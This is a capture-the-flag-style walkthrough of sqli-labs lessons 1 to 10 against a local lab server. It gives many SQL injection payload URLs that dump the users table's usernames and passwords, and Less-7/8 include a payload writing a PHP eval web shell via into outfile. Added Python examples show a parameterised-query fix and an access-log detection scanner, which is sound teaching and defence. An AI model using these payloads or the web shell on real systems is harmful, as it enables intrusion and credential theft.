【Lab Walkthrough】sqli-labs Less-1 to Less-10

Less-1

The page prompts you to pass an ID as a numeric parameter.



http://192.168.80.131/Less-1/?id=1


Append a ' to the id value. The raw SQL syntax error is echoed straight onto the page, which marks this as an injection point.



Although id is given a numeric value, the source code (or simply comparing id=1' and 1=1 --+ with id=1' and 1=2 --+, which return different results) shows that it is handled as a string.


$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
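As an added example (not code from sqli-labs or from this write-up), the query pattern above rebuilt in Python on an in-memory SQLite table, beside a hardened version that validates the numeric id and binds it as a parameter, plus a request wrapper that never returns the database's own error text. The users table, its rows, and the function names are constructed for the example.

```python
import sqlite3

def make_db():
    # Constructed stand-in for the lab's users table (names and passwords are made up).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "alice", "pw-alice"), (2, "bob", "pw-bob")])
    conn.commit()
    return conn

def lookup_vulnerable(conn, user_id):
    # Same shape as the lab's $sql = "SELECT * FROM users WHERE id='$id' LIMIT 0,1":
    # the raw parameter is spliced into the SQL text, so a ' inside it ends the
    # literal and whatever follows is parsed as SQL.
    sql = f"SELECT * FROM users WHERE id='{user_id}' LIMIT 0,1"
    return conn.execute(sql).fetchone()

def lookup_hardened(conn, user_id):
    # 1) the id is declared numeric, so anything that is not an integer is rejected
    try:
        id_int = int(user_id)
    except (TypeError, ValueError):
        return None
    # 2) the value is bound through a placeholder; the driver passes it as data, never as SQL
    return conn.execute("SELECT * FROM users WHERE id=? LIMIT 0,1", (id_int,)).fetchone()

def handle_request(conn, user_id, lookup):
    # Page-level wrapper: the database's error text (which in Less-1 reveals the
    # query and its quoting) is logged server-side, never returned to the client.
    try:
        row = lookup(conn, user_id)
    except sqlite3.Error:
        return "error: request could not be processed"
    return "no data" if row is None else f"{row[1]}:{row[2]}"

if __name__ == "__main__":
    db = make_db()
    for value in ("1", "1'", "1' and 1=1 --+", "1' and 1=2 --+"):
        print(repr(value), "| vulnerable:", handle_request(db, value, lookup_vulnerable),
              "| hardened:", handle_request(db, value, lookup_hardened))
```

Run stand-alone, the vulnerable path reproduces the behaviour the write-up relies on (a bare ' raises a syntax error, 1=1 and 1=2 give different results), while the hardened path returns "no data" for every malformed value: once the id is bound instead of concatenated, the closing-character question (' , ", ) and so on) that occupies Less-1 through Less-7 no longer arises.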


Find the injection point first, then work out the fields. The most direct approach is to run a complete statement of our own through the input, and the usual way to do that is a UNION query.
A UNION query must match the number of columns; it does not need the column names, and guessing the column count is far cheaper than brute-forcing the names.
id=1' union select 1,2,3--+ : the number of values in the select is the column count being tested. If it is correct the page renders normally; otherwise the page shows the error The used SELECT statements have a different number of columns.



You can also use order by <column number> to find out how many columns the current table has, then reuse that count in the union. By trying, we learn there are 3 columns. Next we need to know which positions are echoed, i.e. which of the selected fields are shown on the page.
One echoed position is enough.

Use id=-1 instead of id=1 so that the query before the union returns nothing; the first row of the result set is then the row produced by the union.

id=-1' union select 1,2,4--+



For columns whose data type is unknown, NULL can be used instead, e.g. id=-1' union select null,null,null--+

Some details differ between MySQL versions. Below MySQL 4.0, union select is not supported. From MySQL 5.0 on there is a default database, information_schema, which holds metadata for all of MySQL's databases: database names, table names, column names and data types, access privileges, and so on. It contains a table named tables with the columns table_name and table_schema, which record each table's name and the database that table belongs to.

Retrieving data
Check the current database and the database user:
-1' union select 1,database(),user()



#Check the current database version and operating system
-1' union select 1,version(),@@version_compile_os--+

The conventional view is that a numeric (unquoted) injection point needs no closing character.
A string-type point has to consider how the value is closed: the quote character ' or ", possibly %, possibly a trailing ), and other patterns may exist as well.
Repeating the steps above, we learn that the current database is security. Note that for a string column, table_schema= must be followed by a quoted value, otherwise a syntax error is shown.
Check the table names in the current database (database name known to be security):
#-1' union select 1, table_name,table_schema from information_schema.tables where table_schema ='security' --+
-1' union select 1, group_concat(table_name),table_schema from information_schema.tables where table_schema ='security' --+

group_concat combines all the table_name values of that database into one row for display.


Check the column names of a table (table name known to be users):
-1' union select 1, 2, group_concat(column_name) from information_schema.columns where table_name='users'--+
group_concat combines the column names of the users table into one line for display.


Check the values of a column in a table (table name users, column name username):
-1' union select 1, group_concat(username), 3 from users --+
-1' union select 1, group_concat(username),password from users where username='admin'--+


Several MySQL comment styles

# : single-line comment
-- followed by a space: the second MySQL single-line comment style. --+ is commonly used because the + is decoded as a space in the URL. In Oracle, -- needs no trailing space.

id=1' and (length(database()))>3--+

Less-2


The page prompts to pass the id value as a parameter.
?id=1 displays normally.


Try ' : an SQL error is reported, indicating an injection point here.
Try ' and 1=1 --+ and ' and 1=2 --+ : both show an SQL syntax error.
Try and 1=1--+ : normal; and 1=2--+ : no output and no error, indicating the statement is syntactically correct and simply returns no data.
So this is a numeric injection point. This type needs no closing character, which is simpler and more convenient.
Lesson 1 already told us the general layout of the database, so here we skip some steps and go straight to the union.

Number of confirmation fields

http://192.168.80.131/Less-2/?id=1 union select 1,2,3--+ displays normally
http://192.168.80.131/Less-2/?id=1 union select 1,2,3,4--+ SQL error: The used SELECT statements have a different number of columns
so the number of columns is 3

View the echoed positions

Change id to -1 so that the query before the union returns nothing, then use union select to see which fields are displayed.
http://192.168.80.131/Less-2/?id=-1 union select 1,2,3--+


View the current database name


The current database is named security.

View the name of the table that exists in the current database

http://192.168.80.131/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema ='security' --+


View the column names of a table

http://192.168.80.131/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+


-1 union select 1, group_concat(username) ,password from users


-1 union select 1,group_concat(username) ,password from users where username='admin'


Less-3


use near ''1'') LIMIT 0,1' at line 1
Note the error message: it reveals the original SQL statement and an extra ). Compared with the earlier routine, observe the differences:
?id=1' reports an SQL syntax error, indicating an injection point.
?id=1 and 1=2--+ and ?id=1 and 1=1--+ both display normally, indicating this is not a numeric type.
?id=1' and 1=2--+ and ?id=1' and 1=1--+ both show a syntax error, which may be a closing problem.
Combining this with the error message, try adding ) to close.
http://192.168.80.131/Less-3/?id=1')--+ displays normally, indicating the closing succeeded.
Following Less-1 and Less-2:
http://192.168.80.131/Less-3/?id=-1') union select 1,2,3--+


http://192.168.80.131/Less-3/?id=-1') union select 1, group_concat(username) ,password from users where username='admin'--+


Less-4

The old routine: ?id=1' turns out to be fine, and the ' and tests are also normal. Since http://192.168.80.131/Less-4/?id=1' displays normally, one might conclude there is no injection point. But we know there must be one, so we suspect the ' is being filtered or replaced in some way.
Try " : an error appears, right syntax to use near '"1"") LIMIT 0,1' at line 1


So the id is closed with double quotes.
http://192.168.80.131/Less-4/?id=-1") union select 1,2,3 --+


http://192.168.80.131/Less-4/?id=-1") union select 1,username,password from users where username='admin'--+


Less-5

http://192.168.80.131/Less-5/?id=1


http://192.168.80.131/Less-5/?id=1'
right syntax to use near ''1'' LIMIT 0,1' at line 1 indicates an injection point, and '--+ should close it
http://192.168.80.131/Less-5/?id=1'--+


It can indeed be closed.
Trying id=1 and id=2 both show You are in..., i.e. there is no echo, and nothing relevant appears in the HTML response either. Presumably this lab is blind injection.
Try id=1' and 1=1--+ (normal display) and id=1' and 1=2--+ (no display): this indicates string-type Boolean blind injection.
?id=1' and length("abc")=2--+
?id=1' and length("abc")=3--+

http://192.168.80.131/Less-5/?id=1' union select 1,count(*), concat((select database()),":", floor(rand()*2))as a from information_schema.tables group by a--+

http://192.168.80.131/Less-5/?id=1' union select 1,count(*), concat((select password from users where username='admin' limit 0,1),":", floor(rand()*2))as a from information_schema.tables group by a--+


Less-6

Same as Less-5, with ' changed to ".


Less-7

/?id=1' reports a syntax error directly, but the error has been handled by the application.
The error message does not reveal a possible closing character.


'))

http://192.168.80.131/Less-7/?id=1'))--+


Closing succeeds. The problem now is that the queried data has no display positions, so the result cannot be seen directly through a statement as before.


http://192.168.80.131/Less-7/?id=-1')) union select 1,2,3 into outfile "/var/lib/mysql/abcd.php"--+ attempts to write a file.
Note the select after id=-1 union.
http://192.168.80.131/Less-7/?id=-1')) union select 1,"<?php @eval($_POST['chopper']);?>",3 into outfile "/var/lib/mysql/123456.php" --+
Then check the local folder to see whether the file was written. Note that even though the write succeeds, the page still shows a syntax error.


Under Windows the path uses \ ; note that \ has to be escaped.
Also note that when the database's file permission is used to write a file to the operating system, an existing file with the same name cannot be overwritten: if chao.php is uploaded once and chao.php is uploaded again, the second command has no effect, i.e. the content of the new chao.php does not overwrite the previous chao.php.

Less-8

http://192.168.80.131/Less-8/?id=-1' union select 1,"<?php @eval($_POST['chopper']);?>",3 into outfile "/var/lib/mysql/1234567.php" --+


Less-9

Trying id=1, id=2, id=-1, id=1', id=", id=1'--+, id=1" --+ all display the same page.
Guessing that Boolean-based blind judgement will not work on this page, try time-based injection.

http://192.168.80.131/Less-9/?id=1' and sleep(5)--+

Time-based injection is the least efficient, and network delay can also cause misjudgement.
Once there is a judgement point, it can be combined with substring functions to enumerate data bit by bit.

Less-10

http://192.168.80.131/Less-10/?id=1" and sleep(5)--+
Similar to Less-9, but the closing character is " instead.
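From the defender's side, every request in Less-1 to Less-10 leaves a distinctive trace in the web server's access log: union select and information_schema probes (Less-1 to Less-4), the floor(rand()) error-based trick (Less-5/6), into outfile writes (Less-7/8), and sleep() delays (Less-9/10). As an added example (not part of this write-up or of sqli-labs), a small Python scanner that parses combined-format log lines, URL-decodes the query string the way the server does, and tags each request with the payload families it matches. The log lines are constructed to mirror the requests above; the signature set and all names are this example's own.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Signatures for the payload families used in Less-1 to Less-10 (the pattern
# choice is this example's own, not a rule set from sqli-labs).
SIGNATURES = {
    "union_select":  re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema_probe":  re.compile(r"\binformation_schema\.(tables|columns)\b", re.I),
    "file_write":    re.compile(r"\binto\s+(out|dump)file\b", re.I),
    "time_delay":    re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
    "error_based":   re.compile(r"\bfloor\s*\(\s*rand\s*\(", re.I),
    "version_probe": re.compile(r"\bversion\s*\(|@@version", re.I),
    "comment_tail":  re.compile(r"--[\s+]*$|#\s*$"),
}

# Apache/nginx combined-format request line: client, timestamp, method, path, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def decode_query(path):
    # Decode the way the web server does: %27 -> ', %20 and + -> space, so the
    # common --+ terminator becomes "-- " before the signatures are applied.
    return unquote_plus(urlsplit(path).query)

def classify(path):
    query = decode_query(path)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(query))

def scan(lines):
    # Returns one record per request that matches at least one signature.
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify(m["path"])
        if tags:
            hits.append({"ip": m["ip"], "ts": m["ts"], "path": m["path"],
                         "status": m["status"], "tags": tags})
    return hits

# Constructed log lines modelled on the write-up's requests (not a real capture).
SAMPLE_LOG = [
    '192.168.80.1 - - [04/May/2021:07:27:33 +0800] "GET /Less-1/?id=1 HTTP/1.1" 200 720',
    '192.168.80.1 - - [04/May/2021:10:55:31 +0800] "GET /Less-1/?id=-1%27%20union%20select%201,group_concat(table_name),table_schema%20from%20information_schema.tables%20where%20table_schema=%27security%27%20--+ HTTP/1.1" 200 760',
    '192.168.80.1 - - [04/May/2021:16:29:41 +0800] "GET /Less-7/?id=-1%27))%20union%20select%201,2,3%20into%20outfile%20%22/var/lib/mysql/abcd.php%22--+ HTTP/1.1" 200 640',
    '192.168.80.1 - - [04/May/2021:17:08:56 +0800] "GET /Less-9/?id=1%27%20and%20sleep(5)--+ HTTP/1.1" 200 700',
    '192.168.80.1 - - [04/May/2021:14:33:20 +0800] "GET /Less-5/?id=1%27%20union%20select%201,count(*),concat((select%20database()),%22:%22,floor(rand()*2))as%20a%20from%20information_schema.tables%20group%20by%20a--+ HTTP/1.1" 200 690',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ts"], hit["ip"], hit["status"], ",".join(hit["tags"]), hit["path"])
```

The decode step is what makes this work on real logs: the raw line still carries %27 and --+, so matching before decoding misses the quote and the comment terminator. Note that the file writes in Less-7/8 depend on the MySQL account holding the FILE privilege and on secure_file_priv not being NULL (or pointing at the directory being written to); a web application account without FILE, and a server with secure_file_priv set, turns that whole class of request into a failed query that this scanner still flags.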